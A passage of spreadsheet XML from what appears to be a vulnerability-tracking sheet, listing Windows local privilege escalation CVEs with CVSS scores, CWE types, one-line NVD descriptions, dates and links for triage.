      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69561</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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40" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69576</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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2" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69582</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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4" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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45" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69585</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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7" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69592</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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9" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69604</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69608</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69612</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69685</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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55" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
